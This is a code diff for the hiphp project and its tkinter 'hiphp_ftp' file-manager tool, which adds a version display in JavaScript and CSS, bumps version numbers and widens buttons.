    45 45   //var down='<a class="pointer" onclick="down('+"'"+pathxx+"'"+')">dddd</a>'+s;
    46 46   ls+='<tr><td>'+check+" "+img_icon+pathxx+'</td><td>'+permxx+'</td><td>'+edit+ren+del+'</td></tr>';
    skipped 130 lines
    177 177   }
    178 178  }
    179 179   
     180 +//version:
     181 +function version(){
     182 + eel.version()(
     183 + function(retu){
     184 + var ver = document.getElementById("version");
     185 + var hiphp_version=retu[1];
     186 + var hiphp_desktop=retu[0];
     187 + ver.innerText=hiphp_version+", "+hiphp_desktop;
     188 + }
     189 + )
     190 +}
     191 + 
    180 192  /*
    181 193  //download:
    182 194  function down(path){
    skipped 9 lines
    192 204  }
    193 205  */
    194 206  //}END.
    195  - 
  • ■ ■ ■ ■ ■
    skipped 173 lines
    174 174   padding: 10px;
    175 175   text-align: center;
    176 176  }
     177 + 
     178 +.version{
     179 + position: fixed;
     180 + text-align: left;
     181 + bottom: -250px;
     182 + width: 100%;
     183 + font-size: 10px;
     184 +}
    177 185  /*}END.*/
    178  - 
  • ■ ■ ■ ■ ■
     1 +0.2.0
  • tools/hiphp_ftp/favicon.png
  • ■ ■ ■ ■ ■ ■
    skipped 13 lines
    14 14  #START{
    15 15  import os
    16 16  from hiphp import *
     17 +from hiphp.hiphpversion import __version__
    17 18  from tkinter import *
    18 19  from tkinter import filedialog
    19 20  from chardet import detect
     21 +
     22 +ftp_version="1.0.8"
    20 23  
    21 24  usage_msg=f"USAGE : python3 {sys.argv[0]} [KEY] [URL]"
    22 25  
    skipped 153 lines
    176 179  
    177 180  get_id_btn=Button(root,text="Get ID",command=get_id)
    178 181  get_id_btn.pack()
    179  -get_id_btn.config(width=15)
     182 +get_id_btn.config(width=17)
    180 183  
    181 184  Reconnect_btn=Button(root,text="Reconnect",command=Reconnect)
    182 185  Reconnect_btn.pack()
    183  -Reconnect_btn.config(width=15)
     186 +Reconnect_btn.config(width=17)
    184 187  
    185 188  select_all_btn=Button(root,text="Select all",command=select_all)
    186 189  select_all_btn.pack()
    187  -select_all_btn.config(width=15)#,height=2
     190 +select_all_btn.config(width=17)#,height=2
    188 191  
    189 192  unselect_all_btn=Button(root,text="Unselect all",command=unselect_all)
    190 193  unselect_all_btn.pack()
    191  -unselect_all_btn.config(width=15)
     194 +unselect_all_btn.config(width=17)
    192 195  
    193 196  openSelected_btn=Button(root,text="Open",command=openSelected)
    194 197  openSelected_btn.pack()
    195  -openSelected_btn.config(width=15)
     198 +openSelected_btn.config(width=17)
    196 199  
    197 200  upSelected_btn=Button(root,text="Upload",command=upSelected)
    198 201  upSelected_btn.pack()
    199  -upSelected_btn.config(width=15)
     202 +upSelected_btn.config(width=17)
    200 203  
    201 204  upSelected_to_btn=Button(root,text="Upload to",command=upSelected_to)
    202 205  upSelected_to_btn.pack()
    203  -upSelected_to_btn.config(width=15)
     206 +upSelected_to_btn.config(width=17)
    204 207  
    205 208  unzip_btn=Button(root,text="Unzip",command=unzip)
    206 209  unzip_btn.pack()
    207  -unzip_btn.config(width=15)
     210 +unzip_btn.config(width=17)
    208 211  
    209 212  deleteSelected_btn=Button(root,text="Delete",command=deleteSelected)
    210 213  deleteSelected_btn.pack()
    211  -deleteSelected_btn.config(width=15)
     214 +deleteSelected_btn.config(width=17)
    212 215  
    213 216  var1=IntVar()
    214 217  c1=Checkbutton(root,text='multiple selection',variable=var1,onvalue=1,offvalue=0,command=selectmode)
    215 218  c1.pack(side="top")
    216 219  
    217  -w=Label(root,text="v1.0.7 by yasserbdj96")
     220 +w=Label(root,text=f"hiphp V{__version__} ftp V{ftp_version}")
    218 221  w.pack()
    219 222,rely=1.0,anchor='se')
    220 223  
    221 224  mainloop()
    222 225  #}END.
    223  - 
  • tools/hiphp_ftp/screenshot/screenshot.png
  • ■ ■ ■ ■ ■
     1 +1.0.8
  • ■ ■ ■ ■
    1  -0.2.23
     1 +0.2.24
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